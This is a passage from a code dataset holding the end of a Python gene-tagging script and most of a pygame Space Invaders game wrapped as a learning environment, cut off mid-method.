0/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[line]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n else:#_RARE_ ALWAYS TAKES GENE\r\n gene_prob = emissions_gene[\"_RARE_\"]/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[\"_RARE_\"]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n else:\r\n tags.append(\"\\n\") #otherwise an empty line\r\n\r\n with open(\"gene.test.p1.out\", \"w\") as devp1out:\r\n devp1out.writelines(tags)\r\n\r\nif __name__ == \"__main__\":\r\n simple_gene_tagger(\"gene_rare.counts\", \"gene.test\")\r\n","sub_path":"linguistic_approaches/tp3/gene/simple_gene_tagger.py","file_name":"simple_gene_tagger.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"385357070","text":"# Space Invaders\n# Created by Lee Robinson\n\n#!/usr/bin/env python\nimport os\nimport math as mth\nfrom pygame import *\n#import pygame\nimport sys\nimport argparse\nimport numpy as np\nfrom random import shuffle, randrange, choice, randint\nfrom .. import base\n\n# R G B\nWHITE \t= (255, 255, 255)\nGREEN \t= (78, 255, 87)\nYELLOW \t= (241, 255, 0)\nBLUE \t= (80, 255, 239)\nPURPLE \t= (203, 0, 255)\nRED \t= (237, 28, 36)\n\nSCREEN \t\t= display.set_mode((800,600))\nFONT = \"ple/games/SpaceInvadersGame/fonts/space_invaders.ttf\"\nIMG_NAMES \t= [\"ship\", \"ship\", \"mystery\", \"enemy1_1\", \"enemy1_2\", \"enemy2_1\", \"enemy2_2\",\n\t\t\t\t\"enemy3_1\", \"enemy3_2\", \"explosionblue\", \"explosiongreen\", \"explosionpurple\", \"laser\", \"enemylaser\"]\nIMAGES \t\t= {name: image.load(\"ple/games/SpaceInvadersGame/images/{}.png\".format(name)).convert_alpha()\n\t\t\t\tfor name in IMG_NAMES}\n\nclass Ship(sprite.Sprite):\n\tdef __init__(self):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"ship\"]\n\t\tself.rect = self.image.get_rect(topleft=(375, 540))\n\t\tself.speed = 5\n\n\tdef update(self, keys, *args):\n\t\tif keys[K_LEFT] and self.rect.x > 10:\n\t\t\tself.rect.x -= self.speed\n\t\tif keys[K_RIGHT] and self.rect.x < 740:\n\t\t\tself.rect.x += self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef move_left(self):\n\t\tif self.rect.x > 10:\n\t\t\tself.rect.x -= self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef move_right(self):\n\t\tif self.rect.x < 740:\n\t\t\tself.rect.x += self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef no_move(self) :\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Bullet(sprite.Sprite):\n\tdef __init__(self, xpos, ypos, direction, speed, filename, side):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[filename]\n\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\tself.speed = speed\n\t\tself.direction = direction\n\t\tself.side = side\n\t\tself.filename = filename\n\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\t\tself.rect.y += self.speed * self.direction\n\t\tif self.rect.y < 15 or self.rect.y > 600:\n\t\t\tself.kill()\n\n\nclass Enemy(sprite.Sprite):\n\tdef __init__(self, row, column):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.row = row\n\t\tself.column = column\n\t\tself.images = []\n\t\tself.load_images()\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\t\tself.direction = 1\n\t\tself.rightMoves = 15\n\t\tself.leftMoves = 30\n\t\tself.moveNumber = 0\n\t\tself.moveTime = 600\n\t\tself.firstTime = True\n\t\tself.movedY = False\n\t\tself.columns = [False] * 10\n\t\tself.aliveColumns = [True] * 10\n\t\tself.addRightMoves = False\n\t\tself.addLeftMoves = False\n\t\tself.numOfRightMoves = 0\n\t\tself.numOfLeftMoves = 0\n\t\tself.timer = time.get_ticks()\n\n\tdef update(self, keys, currentTime, killedRow, killedColumn, killedArray):\n\t\tself.check_column_deletion(killedRow, killedColumn, killedArray)\n\t\tif currentTime - self.timer > self.moveTime:\n\t\t\tself.movedY = False\n\t\t\tif self.moveNumber >= self.rightMoves and self.direction == 1:\n\t\t\t\tself.direction *= -1\n\t\t\t\tself.moveNumber = 0\n\t\t\t\tself.rect.y += 35\n\t\t\t\tself.movedY = True\n\t\t\t\tif self.addRightMoves:\n\t\t\t\t\tself.rightMoves += self.numOfRightMoves\n\t\t\t\tif self.firstTime:\n\t\t\t\t\tself.rightMoves = self.leftMoves\n\t\t\t\t\tself.firstTime = 
False\n\t\t\t\tself.addRightMovesAfterDrop = False\n\t\t\tif self.moveNumber >= self.leftMoves and self.direction == -1:\n\t\t\t\tself.direction *= -1\n\t\t\t\tself.moveNumber = 0\n\t\t\t\tself.rect.y += 35\n\t\t\t\tself.movedY = True\n\t\t\t\tif self.addLeftMoves:\n\t\t\t\t\tself.leftMoves += self.numOfLeftMoves\n\t\t\t\tself.addLeftMovesAfterDrop = False\n\t\t\tif self.moveNumber < self.rightMoves and self.direction == 1 and not self.movedY:\n\t\t\t\tself.rect.x += 10\n\t\t\t\tself.moveNumber += 1\n\t\t\tif self.moveNumber < self.leftMoves and self.direction == -1 and not self.movedY:\n\t\t\t\tself.rect.x -= 10\n\t\t\t\tself.moveNumber += 1\n\n\t\t\tself.index += 1\n\t\t\tif self.index >= len(self.images):\n\t\t\t\tself.index = 0\n\t\t\tself.image = self.images[self.index]\n\n\t\t\tself.timer += self.moveTime\n\t\tgame.screen.blit(self.image, self.rect)\n\t\tif self.rect.y > 600:\n\t\t\tself.kill()\n\n\tdef check_column_deletion(self, killedRow, killedColumn, killedArray):\n\t\tif killedRow != -1 and killedColumn != -1:\n\t\t\tkilledArray[killedRow][killedColumn] = 1\n\t\t\tfor column in range(10):\n\t\t\t\tif all([killedArray[row][column] == 1 for row in range(5)]):\n\t\t\t\t\tself.columns[column] = True\n\n\t\tfor i in range(5):\n\t\t\tif all([self.columns[x] for x in range(i + 1)]) and self.aliveColumns[i]:\n\t\t\t\tself.leftMoves += 5\n\t\t\t\tself.aliveColumns[i] = False\n\t\t\t\tif self.direction == -1:\n\t\t\t\t\tself.rightMoves += 5\n\t\t\t\telse:\n\t\t\t\t\tself.addRightMoves = True\n\t\t\t\t\tself.numOfRightMoves += 5\n\t\t\t\t\t\n\t\tfor i in range(5):\n\t\t\tif all([self.columns[x] for x in range(9, 8 - i, -1)]) and self.aliveColumns[9 - i]:\n\t\t\t\tself.aliveColumns[9 - i] = False\n\t\t\t\tself.rightMoves += 5\n\t\t\t\tif self.direction == 1:\n\t\t\t\t\tself.leftMoves += 5\n\t\t\t\telse:\n\t\t\t\t\tself.addLeftMoves = True\n\t\t\t\t\tself.numOfLeftMoves += 5\n\n\tdef load_images(self):\n\t\timages = {0: [\"1_2\", \"1_1\"],\n\t\t\t\t 1: [\"2_2\", \"2_1\"],\n\t\t\t\t 2: [\"2_2\", \"2_1\"],\n\t\t\t\t 3: [\"3_1\", \"3_2\"],\n\t\t\t\t 4: [\"3_1\", \"3_2\"],\n\t\t\t\t }\n\t\timg1, img2 = (IMAGES[\"enemy{}\".format(img_num)] for img_num in images[self.row])\n\t\tself.images.append(transform.scale(img1, (40, 35)))\n\t\tself.images.append(transform.scale(img2, (40, 35)))\n\n\nclass Blocker(sprite.Sprite):\n\tdef __init__(self, size, color, row, column):\n\t sprite.Sprite.__init__(self)\n\t self.height = size\n\t self.width = size\n\t self.color = color\n\t self.image = Surface((self.width, self.height))\n\t self.image.fill(self.color)\n\t self.rect = self.image.get_rect()\n\t self.row = row\n\t self.column = column\n\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Mystery(sprite.Sprite):\n\tdef __init__(self):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"mystery\"]\n\t\tself.image = transform.scale(self.image, (75, 35))\n\t\tself.rect = self.image.get_rect(topleft=(-80, 45))\n\t\tself.row = 5\n\t\tself.moveTime = 25000\n\t\tself.direction = 1\n\t\tself.timer = time.get_ticks()\n\t\tself.mysteryEntered = mixer.Sound('ple/games/SpaceInvadersGame/sounds/mysteryentered.wav')\n\t\tself.mysteryEntered.set_volume(0.3)\n\t\tself.playSound = False\n\n\tdef update(self, keys, currentTime, *args):\n\t\tresetTimer = False\n\t\tif (currentTime - self.timer > self.moveTime) and (self.rect.x < 0 or self.rect.x > 800) and self.playSound:\n\t\t\tself.mysteryEntered.play()\n\t\t\tself.playSound = False\n\t\tif (currentTime - self.timer > 
self.moveTime) and self.rect.x < 840 and self.direction == 1:\n\t\t\tself.mysteryEntered.fadeout(4000)\n\t\t\tself.rect.x += 2\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\tif (currentTime - self.timer > self.moveTime) and self.rect.x > -100 and self.direction == -1:\n\t\t\tself.mysteryEntered.fadeout(4000)\n\t\t\tself.rect.x -= 2\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\tif (self.rect.x > 830):\n\t\t\tself.playSound = True\n\t\t\tself.direction = -1\n\t\t\tresetTimer = True\n\t\tif (self.rect.x < -90):\n\t\t\tself.playSound = True\n\t\t\tself.direction = 1\n\t\t\tresetTimer = True\n\t\tif (currentTime - self.timer > self.moveTime) and resetTimer:\n\t\t\tself.timer = currentTime\n\n\t\nclass Explosion(sprite.Sprite):\n\tdef __init__(self, xpos, ypos, row, ship, mystery, score):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.isMystery = mystery\n\t\tself.isShip = ship\n\t\tif mystery:\n\t\t\tself.text = Text(FONT, 20, str(score), WHITE, xpos+20, ypos+6)\n\t\telif ship:\n\t\t\tself.image = IMAGES[\"ship\"]\n\t\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\telse:\n\t\t\tself.row = row\n\t\t\tself.load_image()\n\t\t\tself.image = transform.scale(self.image, (40, 35))\n\t\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\t\n\t\tself.timer = time.get_ticks()\n\t\t\n\tdef update(self, keys, currentTime):\n\t\tif self.isMystery:\n\t\t\tif currentTime - self.timer <= 200:\n\t\t\t\tself.text.draw(game.screen)\n\t\t\tif currentTime - self.timer > 400 and currentTime - self.timer <= 600:\n\t\t\t\tself.text.draw(game.screen)\n\t\t\tif currentTime - self.timer > 600:\n\t\t\t\tself.kill()\n\t\telif self.isShip:\n\t\t\tif currentTime - self.timer > 300 and currentTime - self.timer <= 600:\n\t\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\tif currentTime - self.timer > 900:\n\t\t\t\tself.kill()\n\t\telse:\n\t\t\tif currentTime - self.timer <= 100:\n\t\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\tif currentTime - self.timer > 100 and currentTime - self.timer <= 200:\n\t\t\t\tself.image = transform.scale(self.image, (50, 45))\n\t\t\t\tgame.screen.blit(self.image, (self.rect.x-6, self.rect.y-6))\n\t\t\tif currentTime - self.timer > 400:\n\t\t\t\tself.kill()\n\t\n\tdef load_image(self):\n\t\timgColors = [\"purple\", \"blue\", \"blue\", \"green\", \"green\"]\n\t\tself.image = IMAGES[\"explosion{}\".format(imgColors[self.row])]\n\n\t\t\t\nclass Life(sprite.Sprite):\n\tdef __init__(self, xpos, ypos):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"ship\"]\n\t\tself.image = transform.scale(self.image, (23, 23))\n\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\t\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Text(object):\n\tdef __init__(self, textFont, size, message, color, xpos, ypos):\n\t\tself.font = font.Font(textFont, size)\n\t\tself.surface = self.font.render(message, True, color)\n\t\tself.rect = self.surface.get_rect(topleft=(xpos, ypos))\n\n\tdef draw(self, surface):\n\t\tsurface.blit(self.surface, self.rect)\n\n\nclass SpaceInvaders(object):\n\tdef __init__(self):\n\t\tmixer.pre_init(44100, -16, 1, 512)\n\t\tinit()\n\t\tself.caption = display.set_caption('Space Invaders')\n\t\tself.screen = SCREEN\n\t\tself.background = image.load('ple/games/SpaceInvadersGame/images/background.jpg').convert()\n\t\tself.startGame = True\n\t\t#self.mainScreen = True\n\t\tself.gameOver = False\n\t\t# Initial value for a new 
game\n\t\tself.enemyPositionDefault = 65\n\t\t# Counter for enemy starting position (increased each new round)\n\t\tself.enemyPositionStart = self.enemyPositionDefault\n\t\t# Current enemy starting position\n\t\tself.enemyPosition = self.enemyPositionStart\n\n\tdef reset(self, score, lives, newGame=False):\n\t\tself.player = Ship()\n\t\tself.playerGroup = sprite.Group(self.player)\n\t\tself.explosionsGroup = sprite.Group()\n\t\tself.bullets = sprite.Group()\n\t\tself.mysteryShip = Mystery()\n\t\tself.mysteryGroup = sprite.Group(self.mysteryShip)\n\t\tself.enemyBullets = sprite.Group()\n\t\tself.reset_lives(lives)\n\t\tself.enemyPosition = self.enemyPositionStart\n\t\tself.make_enemies()\n\t\t# Only create blockers on a new game, not a new round\n\t\tif newGame:\n\t\t\tself.allBlockers = sprite.Group(self.make_blockers(0), self.make_blockers(1), self.make_blockers(2), self.make_blockers(3))\n\t\tself.keys = key.get_pressed()\n\t\tself.clock = time.Clock()\n\t\tself.timer = time.get_ticks()\n\t\tself.noteTimer = time.get_ticks()\n\t\tself.shipTimer = time.get_ticks()\n\t\tself.score = score\n\t\tself.lives = lives\n\t\t#self.create_audio()\n\t\tself.create_text()\n\t\tself.killedRow = -1\n\t\tself.killedColumn = -1\n\t\tself.makeNewShip = False\n\t\tself.shipAlive = True\n\t\tself.killedArray = [[0] * 10 for x in range(5)]\n\t\tself.startGame = True\n\t\tself.gameOver = False\n\n\tdef make_blockers(self, number):\n\t\tblockerGroup = sprite.Group()\n\t\tfor row in range(4):\n\t\t\tfor column in range(9):\n\t\t\t\tblocker = Blocker(10, GREEN, row, column)\n\t\t\t\tblocker.rect.x = 50 + (200 * number) + (column * blocker.width)\n\t\t\t\tblocker.rect.y = 450 + (row * blocker.height)\n\t\t\t\tblockerGroup.add(blocker)\n\t\treturn blockerGroup\n\t\n\tdef reset_lives_sprites(self):\n\t\tself.life1 = Life(715, 3)\n\t\tself.life2 = Life(742, 3)\n\t\tself.life3 = Life(769, 3)\n\t\t\n\t\tif self.lives >= 3:\n\t\t\tself.livesGroup = sprite.Group(self.life1, self.life2, self.life3)\n\t\telif self.lives == 2:\n\t\t\tself.livesGroup = sprite.Group(self.life1, self.life2)\n\t\telif self.lives == 1:\n\t\t\tself.livesGroup = sprite.Group(self.life1)\n\t\n\tdef reset_lives(self, lives):\n\t\tself.lives = lives\n\t\tself.reset_lives_sprites()\n\t\n\tdef create_audio(self):\n\t\tself.sounds = {}\n\t\tfor sound_name in [\"shoot\", \"shoot2\", \"invaderkilled\", \"mysterykilled\", \"shipexplosion\"]:\n\t\t\tself.sounds[sound_name] = mixer.Sound(\"ple/games/SpaceInvadersGame/sounds/{}.wav\".format(sound_name))\n\t\t\tself.sounds[sound_name].set_volume(0.2)\n\n\t\tself.musicNotes = [mixer.Sound(\"ple/games/SpaceInvadersGame/sounds/{}.wav\".format(i)) for i in range(4)]\n\t\tfor sound in self.musicNotes:\n\t\t\tsound.set_volume(0.5)\n\n\t\tself.noteIndex = 0\n\n\tdef play_main_music(self, currentTime):\n\t\tmoveTime = self.enemies.sprites()[0].moveTime\n\t\tif currentTime - self.noteTimer > moveTime:\n\t\t\tself.note = self.musicNotes[self.noteIndex]\n\t\t\tif self.noteIndex < 3:\n\t\t\t\tself.noteIndex += 1\n\t\t\telse:\n\t\t\t\tself.noteIndex = 0\n\n\t\t\tself.note.play()\n\t\t\tself.noteTimer += moveTime\n\n\tdef create_text(self):\n\t\tself.titleText = Text(FONT, 50, \"Space Invaders\", WHITE, 164, 155)\n\t\tself.titleText2 = Text(FONT, 25, \"Press any key to continue\", WHITE, 201, 225)\n\t\tself.gameOverText = Text(FONT, 50, \"Game Over\", WHITE, 250, 270)\n\t\tself.nextRoundText = Text(FONT, 50, \"Next Round\", WHITE, 240, 270)\n\t\tself.enemy1Text = Text(FONT, 25, \" = 10 pts\", GREEN, 368, 
270)\n\t\tself.enemy2Text = Text(FONT, 25, \" = 20 pts\", BLUE, 368, 320)\n\t\tself.enemy3Text = Text(FONT, 25, \" = 30 pts\", PURPLE, 368, 370)\n\t\tself.enemy4Text = Text(FONT, 25, \" = ?????\", RED, 368, 420)\n\t\tself.scoreText = Text(FONT, 20, \"Score\", WHITE, 5, 5)\n\t\tself.livesText = Text(FONT, 20, \"Lives \", WHITE, 640, 5)\n\t\t\n\tdef check_input(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\t\tif e.type == KEYDOWN:\n\t\t\t\tif e.key == K_SPACE:\n\t\t\t\t\tif len(self.bullets) == 0 and self.shipAlive:\n\t\t\t\t\t\tif self.score < 1000:\n\t\t\t\t\t\t\tbullet = Bullet(self.player.rect.x+23, self.player.rect.y+5, -1, 15, \"laser\", \"center\")\n\t\t\t\t\t\t\tself.bullets.add(bullet)\n\t\t\t\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t\t\t\t#self.sounds[\"shoot\"].play()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tleftbullet = Bullet(self.player.rect.x+8, self.player.rect.y+5, -1, 15, \"laser\", \"left\")\n\t\t\t\t\t\t\trightbullet = Bullet(self.player.rect.x+38, self.player.rect.y+5, -1, 15, \"laser\", \"right\")\n\t\t\t\t\t\t\tself.bullets.add(leftbullet)\n\t\t\t\t\t\t\tself.bullets.add(rightbullet)\n\t\t\t\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t\t\t\t#self.sounds[\"shoot2\"].play()\n\tdef get_action_left(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.move_left()\n\n\tdef get_action_right(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.move_right()\n\t\n\tdef get_no_action(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\t\tself.player.no_move()\n\n\tdef get_genetic_action(self):\n\t\tself.keys = key.get_pressed()\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\n\tdef shoot(self):\n\t\tif len(self.bullets) == 0 and self.shipAlive:\n\t\t\tif self.score < 1000:\n\t\t\t\tbullet = Bullet(self.player.rect.x+23, self.player.rect.y+5, -1, 15, \"laser\", \"center\")\n\t\t\t\tself.bullets.add(bullet)\n\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t#self.sounds[\"shoot\"].play()\n\t\t\telse:\n\t\t\t\tleftbullet = Bullet(self.player.rect.x+8, self.player.rect.y+5, -1, 15, \"laser\", \"left\")\n\t\t\t\trightbullet = Bullet(self.player.rect.x+38, self.player.rect.y+5, -1, 15, \"laser\", \"right\")\n\t\t\t\tself.bullets.add(leftbullet)\n\t\t\t\tself.bullets.add(rightbullet)\n\t\t\t\tself.allSprites.add(self.bullets)\n\t\t\t\t#self.sounds[\"shoot2\"].play()\n\tdef make_enemies(self):\n\t\tenemies = sprite.Group()\n\t\tfor row in range(5):\n\t\t\tfor column in range(10):\n\t\t\t\tenemy = Enemy(row, column)\n\t\t\t\tenemy.rect.x = 157 + (column * 50)\n\t\t\t\tenemy.rect.y = self.enemyPosition + (row * 45)\n\t\t\t\tenemies.add(enemy)\n\t\t\n\t\tself.enemies = enemies\n\t\tself.allSprites = sprite.Group(self.player, self.enemies, self.livesGroup, self.mysteryShip)\n\n\tdef make_enemies_shoot(self):\n\t\tcolumnList = []\n\t\tfor enemy in self.enemies:\n\t\t\tcolumnList.append(enemy.column)\n\n\t\tcolumnSet = set(columnList)\n\t\tcolumnList = list(columnSet)\n\t\tshuffle(columnList)\n\t\tcolumn = columnList[0]\n\t\tenemyList = []\n\t\trowList = []\n\n\t\tfor enemy in self.enemies:\n\t\t\tif enemy.column == column:\n\t\t\t\trowList.append(enemy.row)\n\t\trow = max(rowList)\n\t\tfor enemy in self.enemies:\n\t\t\tif enemy.column == column and enemy.row == 
row:\n\t\t\t\tif (time.get_ticks() - self.timer) > 200: # changed from original 700 (affects enemy bullet amount)\n\t\t\t\t\tself.enemyBullets.add(Bullet(enemy.rect.x + 14, enemy.rect.y + 20, 1, 5, \"enemylaser\", \"center\"))\n\t\t\t\t\tself.allSprites.add(self.enemyBullets)\n\t\t\t\t\tself.timer = time.get_ticks() \n\n\tdef calculate_score(self, row):\n\t\tscores = {0: 30,\n\t\t\t\t 1: 20,\n\t\t\t\t 2: 20,\n\t\t\t\t 3: 10,\n\t\t\t\t 4: 10,\n\t\t\t\t 5: 150 # choice([50, 100, 150, 300])\n\t\t\t\t }\n\t\t\t\t\t \n\t\tscore = scores[row]\n\t\tself.score += score\n\t\treturn score\n\tdef get_state(self, factor):\n\t\twidth = mth.floor(800/factor)\n\t\theight = mth.floor(600/factor)\n\t\tstate_array = np.zeros([width,height],dtype=np.int)\n\t\tfor spr in self.allSprites.sprites():\n\t\t\tx = mth.floor(spr.rect.center[0] / factor)-1\n\t\t\ty = mth.floor(spr.rect.center[1] / factor)-1\n\t\t\tif type(spr).__name__ == 'Ship':\n\t\t\t\tstate_array[x][y] = 1\n\t\t\tif type(spr).__name__ == 'Enemy':\n\t\t\t\tstate_array[x][y] = 2\n\t\t\tif type(spr).__name__ == 'Bullet':\n\t\t\t\tif(spr.direction == 1):\n\t\t\t\t\tstate_array[x][y] = 3\n\t\t\t\telse:\n\t\t\t\t\tstate_array[x][y] = 6\n\t\t\tif type(spr).__name__ == 'Mystery':\n\t\t\t\tif x >= 0 and y >= 0 and x < width and y <= height:\n\t\t\t\t\tstate_array[x][y] = 4\n\t\tfor blocker in self.allBlockers:\n\t\t\tx = mth.floor(blocker.rect.center[0] / factor)-1\n\t\t\ty = mth.floor(blocker.rect.center[1] / factor)-1\n\t\t\tstate_array[x][y] = 5\n\t\treturn state_array\n\t\n\tdef update_enemy_speed(self):\n\t\tif len(self.enemies) <= 10:\n\t\t\tfor enemy in self.enemies:\n\t\t\t\tenemy.moveTime = 400\n\t\tif len(self.enemies) == 1:\n\t\t\tfor enemy in self.enemies:\n\t\t\t\tenemy.moveTime = 200\n\t\t\t\t\n\tdef check_collisions(self):\n\t\t# 1 for enemy and 2 for player\n\t\tkilled = 0\n\t\t\n\t\tcollidedict = sprite.groupcollide(self.bullets, self.enemyBullets, True, False)\n\t\tif collidedict:\n\t\t\tfor value in collidedict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\tself.enemyBullets.remove(currentSprite)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\n\t\tenemiesdict = sprite.groupcollide(self.bullets, self.enemies, True, False)\n\t\tif enemiesdict:\n\t\t\tfor value in enemiesdict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\t#self.sounds[\"invaderkilled\"].play()\n\t\t\t\t\tself.killedRow = currentSprite.row\n\t\t\t\t\tself.killedColumn = currentSprite.column\n\t\t\t\t\tscore = self.calculate_score(currentSprite.row)\n\t\t\t\t\texplosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, False, score)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\t\t\t\t\tself.enemies.remove(currentSprite)\n\t\t\t\t\tself.gameTimer = time.get_ticks()\n\t\t\t\t\tkilled = 1\n\t\t\t\t\tbreak\n\n\t\tmysterydict = sprite.groupcollide(self.bullets, self.mysteryGroup, True, True)\n\t\tif mysterydict:\n\t\t\tfor value in mysterydict.values():\n\t\t\t\tfor currentSprite in value:\n\t\t\t\t\tcurrentSprite.mysteryEntered.stop()\n\t\t\t\t\t#self.sounds[\"mysterykilled\"].play()\n\t\t\t\t\tscore = self.calculate_score(currentSprite.row)\n\t\t\t\t\texplosion = Explosion(currentSprite.rect.x, currentSprite.rect.y, currentSprite.row, False, True, score)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(currentSprite)\n\t\t\t\t\tself.mysteryGroup.remove(currentSprite)\n\t\t\t\t\tnewShip = 
Mystery()\n\t\t\t\t\tself.allSprites.add(newShip)\n\t\t\t\t\tself.mysteryGroup.add(newShip)\n\t\t\t\t\tkilled = 1\n\t\t\t\t\tbreak\n\n\t\tbulletsdict = sprite.groupcollide(self.enemyBullets, self.playerGroup, True, False) \n\t\tif bulletsdict:\n\t\t\tfor value in bulletsdict.values():\n\t\t\t\tfor playerShip in value:\n\t\t\t\t\tif self.lives > 3:\n\t\t\t\t\t\tself.lives -= 1 \n\t\t\t\t\telif self.lives == 3:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life3)\n\t\t\t\t\t\tself.allSprites.remove(self.life3)\n\t\t\t\t\telif self.lives == 2:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life2)\n\t\t\t\t\t\tself.allSprites.remove(self.life2)\n\t\t\t\t\telif self.lives == 1:\n\t\t\t\t\t\tself.lives -= 1\n\t\t\t\t\t\tself.livesGroup.remove(self.life1)\n\t\t\t\t\t\tself.allSprites.remove(self.life1)\n\t\t\t\t\t\tself.gameOver = True\n\t\t\t\t\t\tself.startGame = False\n\t\t\t\t\tkilled = 2\n\n\t\t\t\t\t#self.sounds[\"shipexplosion\"].play()\n\t\t\t\t\texplosion = Explosion(playerShip.rect.x, playerShip.rect.y, 0, True, False, 0)\n\t\t\t\t\tself.explosionsGroup.add(explosion)\n\t\t\t\t\tself.allSprites.remove(playerShip)\n\t\t\t\t\tself.playerGroup.remove(playerShip)\n\t\t\t\t\tself.makeNewShip = True\n\t\t\t\t\tself.shipTimer = time.get_ticks()\n\t\t\t\t\tself.shipAlive = False\n\n\t\tif sprite.groupcollide(self.enemies, self.playerGroup, True, True):\n\t\t\tself.gameOver = True\n\t\t\tself.startGame = False\n\n\t\tif sprite.groupcollide(self.bullets, self.allBlockers, True, True):\n\t\t\tkilled = 2\n\t\tsprite.groupcollide(self.enemyBullets, self.allBlockers, True, True)\n\t\tsprite.groupcollide(self.enemies, self.allBlockers, False, True)\n\n\t\treturn killed\n\n\tdef create_new_ship(self, createShip, currentTime):\n\t\tif createShip and (currentTime - self.shipTimer > 900):\n\t\t\tself.player = Ship()\n\t\t\tself.allSprites.add(self.player)\n\t\t\tself.playerGroup.add(self.player)\n\t\t\tself.makeNewShip = False\n\t\t\tself.shipAlive = True\n\n\tdef create_game_over(self, currentTime):\n\t\tself.mainScreen = True\n\t\t\n\t\tfor e in event.get():\n\t\t\tif e.type == QUIT:\n\t\t\t\tsys.exit()\n\ngame = SpaceInvaders()\nclass SpaceInvadersGame(base.PyGameWrapper):\n\t\n\n\tdef __init__(self, width=800, height=600, pipe_gap=100):\n\n\t\tactions = {\n\t\t\t \"right\": K_RIGHT,\n\t\t\t \"left\" : K_LEFT,\n\t\t\t \"space\": K_SPACE\n\t\t\t #\"zero\" : K_0\n\t\t}\n\n\t\tfps = 30\n\n\t\tbase.PyGameWrapper.__init__(self, width, height, actions=actions)\n\t\t# so we can preload images\n\t\tdisplay.set_mode((1, 1),NOFRAME)\n\n\t\tself.scale = 30.0 / fps\n\n\t\tself.allowed_fps = 30 # restrict the fps\n\t\n\tdef init(self):\n\t\tself.game = game\n\t\tself.game.reset(0,5 , newGame=True)\n\t\tself.lives = 5\n\t\tself.score = 0\n\t\tself.game_tick = 0\n\n\n\tdef getGameState(self):\n\t\t\"\"\"\n\t\tGets a non-visual state representation of the game.\n\n\t\tReturns\n\t\t-------\n\n\t\tdict\n\t\t\t* player x position.\n\t\t\t* players velocity.\n\t\t\t* Game Score\n\t\t\t* Player Lives\n\n\n\t\t\tSee code for structure.\n\n\t\t\"\"\"\n\n\t\tstate = {\n\t\t\t\"player_x\": self.game.player.rect.x,\n\t\t\t\"player_y\": self.game.player.rect.y,\n\n\t\t\t\"Game Score\": self.game.score ,\n\t\t\t\"Lives\": self.lives\n\t\t}\n\n\t\treturn state\n\n\tdef getScore(self):\n\t\treturn self.score\n\n\tdef _handle_player_events(self):\n\t\tfor current_event in event.get():\n\t\t\tif current_event.type == QUIT:\n\t\t\t\tquit()\n\t\t\t\tsys.exit()\n\n\t\t\tif 
